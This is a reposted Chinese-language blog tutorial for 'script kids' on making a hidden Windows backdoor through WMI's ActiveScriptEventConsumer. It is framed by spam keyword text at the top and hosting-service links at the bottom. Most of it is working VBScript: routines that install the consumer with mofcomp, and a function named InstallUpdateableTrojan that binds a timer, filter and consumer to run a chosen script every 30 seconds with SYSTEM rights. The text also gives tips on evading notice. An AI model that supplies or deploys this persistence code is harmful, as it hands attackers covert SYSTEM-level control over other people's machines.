国产又黄又大又粗的视频,97影视剧院电视剧,国产精品动漫自拍

來源：菠蘿的菠蘿格

Welcome!各位ScriptKid，歡迎來到腳本世界。

今天忙了一天，比較累。不廢話那么多了，切入正題。

這個“三無”后門的核心就是WMI中的永久事件消費(fèi)者ActiveScriptEventConsumer（以下簡稱ASEC）。WMI中有許多這類的事件消費(fèi)者，簡單的來說，當(dāng)與其綁定的事件到達(dá)時，消費(fèi)者就會被觸發(fā)執(zhí)行預(yù)先定義好的功能。例如可以用來執(zhí)行二進(jìn)制程序的 CommandLineEventConsumer等等

ASEC是WMI中的一個標(biāo)準(zhǔn)永久事件消費(fèi)者。它的作用是當(dāng)與其綁定的一個事件到達(dá)時，可以執(zhí)行一段預(yù)先設(shè)定好的JS/VBS腳本。

先來看一下其原型：

復(fù)制代碼

代碼如下:

class ActiveScriptEventConsumer : __EventConsumer
{
uint8 CreatorSID = {1,1,0,0,0,0,0,5,18,0,0,0}; //事件消費(fèi)者的CreatorSID 只讀
uint32 KillTimeout = 0; //腳本允許被執(zhí)行的時間默認(rèn)為0，腳本不會被終止
string MachineName;
uint32 MaximumQueueSize;
string Name; //自定義的事件消費(fèi)者的名字。
string ScriptingEngine; //用于解釋腳本的腳本引擎。VBScript或者JScript
string ScriptFileName; //如果你想從一個文件里面讀取想執(zhí)行的腳本的話，寫上這里吧。
string ScriptText; //用于執(zhí)行的腳本代碼。與ScriptFileName不共戴天。有你沒我，有我沒你
};

ASEC的安裝

對于XP以后的系統(tǒng)來說，ASEC已經(jīng)默認(rèn)安裝到了root\subscription名稱空間。我們可以直接調(diào)用。2000自帶有ASEC的 mof文件，但是沒有默認(rèn)安裝，需要我們自己安裝。另外由于大部分的事件都是在root\cimv2里產(chǎn)生，所以如果你想直接捕獲一些系統(tǒng)事件作為觸發(fā)器的話，還得在其他的名稱空間中安裝ASEC。來看一下在2000/XP/Vista下安裝ASEC到root\cimv2的代碼。

復(fù)制代碼

代碼如下:

Function InstallASECForWin2K ’安裝ASEC For Windows 2000’
Dim ASECPath2K
ASECPath2K = XShell.Expandenvironmentstrings("%windir%\system32\wbem\")
Set MofFile = FSO.opentextfile(ASECPath2K&"scrcons.mof",1,False)
MofContent = MofFile.Readall
MofFile.Close
MofContent = Replace(MofContent,"\\Default","\\cimv2",1,1) ‘替換默認(rèn)的名稱空間
TempMofFile=ASECPath2K&"Temp.mof"
Set TempMof=FSO.CreateTextFile(TempMofFile,False,True)
TempMof.Write MofContent
TempMof.close
XShell.run "mofcomp.exe -N:root\cimv2 "&TempMofFile,0,TRUE
FSO.DeleteFile(TempMofFile)
ASECStatus = "Ready"
’Wscript.Echo "ASECForWin2K Install OK!"
End Function
Function InstallASECForWinXP ’安裝ASEC For Windows XP’
Dim ASECPathXP
XPASECPath = XShell.Expandenvironmentstrings("%windir%\system32\wbem\")
XShell.run "mofcomp.exe -N:root\cimv2 "&XPASECPath&"scrcons.mof",0,TRUE ’直接運(yùn)行安裝即可
ASECStatus = "Ready"
’Wscript.Echo "ASECForWinXP Install OK!"
End Function
Function InstallASECForVista ’安裝ASEC For Windows Vista’
Dim ASECPath2K
ASECPath2K = XShell.Expandenvironmentstrings("%windir%\system32\wbem\")
Set f = FSO.GetFile(ASECPath2K&"scrcons.mof")
Set MofFile = f.OpenAsTextStream(1,-2)
’Set MofFile = FSO.opentextfile(ASECPath2K&"scrcons.mof",1,False)
MofContent = MofFile.Readall
MofFile.Close
MofContent = Replace(MofContent,"#pragma autorecover","",1,1) //需要刪除autorecover，否則安裝出錯
TempMofFile=ASECPath2K&"Temp.mof"
Set TempMof=FSO.CreateTextFile(TempMofFile,False,True)
TempMof.Write MofContent
TempMof.close
XShell.run "mofcomp.exe -N:root\cimv2 "&TempMofFile,0,TRUE
FSO.DeleteFile(TempMofFile)
ASECStatus = "Ready"
’Wscript.Echo "ASECForWinVista Install OK!"
End Function

再來看一個綁定事件和ASEC的實(shí)例。

復(fù)制代碼

代碼如下:

Function InstallUpdateableTrojan
WMILink="winmgmts:\\.\root\cimv2:" //ASEC所在的名稱空間
TrojanName="ScriptKids" //自定義的消費(fèi)者名字，也就是你的后門的名字
TrojanRunTimer=30000 //自定義的腳本運(yùn)行間隔
strtxt="" //自定義的腳本內(nèi)容。為了隱蔽我們就不用scriptfilename了。會被Windows編碼后寫入CIM存儲庫
’配置事件消費(fèi)者’
set Asec=getobject(WMILink&"ActiveScriptEventConsumer").spawninstance_
Asec.name=TrojanName&"_consumer"
Asec.scriptingengine="vbscript"
Asec.scripttext=strtxt
set Asecpath=Asec.put_
’配置計時器’
set WMITimer=getobject(WMILink&"__IntervalTimerInstruction").spawninstance_
WMITimer.timerid=TrojanName&"_WMITimer"
WMITimer.intervalbetweenevents=TrojanRunTimer
WMITimer.skipifpassed=false
WMITimer.put_
’配置事件過濾器’
set EventFilter=getobject(WMILink&"__EventFilter").spawninstance_
EventFilter.name=TrojanName&"_filter"
EventFilter.query="select * from __timerevent where timerid="""&TrojanName&"_WMITimer"""
EventFilter.querylanguage="wql"
set FilterPath=EventFilter.put_
’綁定消費(fèi)者和過濾器’
set Binds=getobject(WMILink&"__FilterToConsumerBinding").spawninstance_
Binds.consumer=Asecpath.path
Binds.filter=FilterPath.path
Binds.put_
End Function

以上代碼的含義就是當(dāng)我們自定義的一個計時器事件發(fā)生時，會被我們所配置的事件過濾器捕獲到，并觸發(fā)與過濾器綁定的消費(fèi)者，也就是我們自定義了腳本的ASEC。達(dá)到我們每隔30秒執(zhí)行一次我們自定義的腳本的目的。很簡單吧：）

最后要說的是，我們自定義的腳本運(yùn)行時，是由系統(tǒng)自帶的scrcons.exe作為腳本宿主進(jìn)行解析，而scrcons.exe是由系統(tǒng)以 SYSTEM權(quán)限啟動的，也就是說，我們的腳本是以SYSTEM權(quán)限執(zhí)行，并且其所創(chuàng)建的任意進(jìn)程都會繼承SYSTEM權(quán)限。美中不足的就是，每當(dāng)腳本執(zhí) 行時，會平白多出一個scrcons.exe的系統(tǒng)進(jìn)程。這也是這個腳本后門目前最容易被發(fā)現(xiàn)的一個弱點(diǎn)。不過，當(dāng)這個腳本24小時才運(yùn)行一次時，有多少人會注意到呢？

香港服務(wù)器租用

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。

相關(guān)文章

硬防服務(wù)器：硬防服務(wù)器有什么不同嗎，選擇硬防怎么樣

網(wǎng)絡(luò)服務(wù)器：如何防服務(wù)器IP暴露，有何應(yīng)對方法

流量攻擊：流量攻擊的表現(xiàn)是什么，怎樣防大流量攻擊

虛擬主機(jī)被攻擊：虛擬主機(jī)被攻擊該怎樣處理，能夠防范嗎

高防服務(wù)器的：國內(nèi)高防服務(wù)器的優(yōu)劣怎樣看教你四點(diǎn)技巧

高防服務(wù)器：高防服務(wù)器的特點(diǎn)是啥，租用的好處在哪

高防服務(wù)器：哪里的高防服務(wù)器好，怎樣看是不是真高防

高防服務(wù)器：常見攻擊服務(wù)器的方式有什么，高防服務(wù)器有用嗎

高防服務(wù)器：高防服務(wù)器究竟好不好，怎樣選才可靠

高防服務(wù)器的價格：500g高防服務(wù)器貴不貴，費(fèi)用多少合理